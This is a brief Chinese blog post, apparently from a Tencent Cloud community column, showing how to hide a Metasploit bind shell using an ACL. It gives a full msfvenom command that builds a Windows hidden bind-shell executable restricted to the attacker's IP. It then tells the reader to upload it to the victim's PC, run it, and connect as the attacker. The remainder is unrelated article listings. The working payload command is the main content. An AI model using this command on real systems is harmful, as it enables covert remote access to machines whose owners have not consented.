专栏首页黑白安全别动我的shell

别动我的shell

别动我的shell

MSF 通过ACL隐藏Bind Shell

[sourcecode language="plain"]root@kali:~# msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.52.129 -f exe > hidden_shell.exe[/sourcecode]

AHOST 就是攻击者的IP:

将exe上传至受害者PC并运行:

这里端口已经开了。

在同段下其他机器连接该端口:

攻击者连接:

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 常规web渗透测试漏洞描述及修复建议

    apache一些样例文件没有删除,可能存在cookie、session伪造,进行后台登录操作

    周俊辉
  • 微软对外披露 Google 工程师发现的 IE 漏洞 攻击者可以控制受影响系统

    Google 工程师发现 IE 中存在一个漏洞,攻击者可以通过漏洞完全控制受害操作系统。

    周俊辉
  • VTest - 漏洞测试辅助系统

    VTest - 漏洞测试辅助系统用于辅助安全工程师漏洞挖掘、测试、复现,集合了mock、httplog、dns tools、xss,可用于测试各类无回显、无法直...

    周俊辉
  • SAP最佳业务实践:MM–采购报价(128)-2报价请求

    1、流程概览表 流程步骤业务条件业务角色事务代码预期结果创建报价请求物料请求采购员ME41创建和打印 RFQ。列出报价RFQ 概览采购员ME4S列出 RFQ...

    SAP最佳业务实践
  • Drupal CMS新安全漏洞预警

    根据公告,6.x、7.x、8.x版本的子系统存在严重安全漏洞,利用该漏洞可能实现远程代码执行攻击,从而影响到业务系统的安全性,该漏洞跟CVE-2018-7600...

    安恒信息
  • Drupal 爆远程代码执行漏洞,腾讯云网站管家率先发布应对策略

    腾讯云安全
  • GitHub 2017年支付漏洞赏金100多万元,超出去年一倍多

    程序员最爱的 GitHub 在 2014 年开展了一项为期 4 年的漏洞奖励计划,到 2017 年已经是第四年。这四年间,累计发放的漏洞赏金约 35 万美元(按...

    FB客服
  • 深入理解Trie树

    前面的文章介绍过各种高效的的数据结构,比如二叉搜索树,AVL树,红黑树,B树,跳跃表等,今天我们再来学习一种多路树,叫做Trie树。

    我是攻城师
  • 企业云和虚拟网络怎样改变电信市场

    今天的企业连通性服务跟5年前相比有很大的差别,电信公司必须对其经营方式作出调整,才能继续保持既有市场份额。 软件定义网络(SDN)和网络功能虚拟化(NFV)等技...

    SDNLAB
  • Nim教程【九】

    向关注这个系列的朋友们,道一声:久违了! 它并没有被我阉掉,他一定会得善终的,请各位不要灰心 Set集合类型 为了在特殊场景下提高程序的性能设置了Set类型,...

    liulun

扫码关注云+社区

领取腾讯云代金券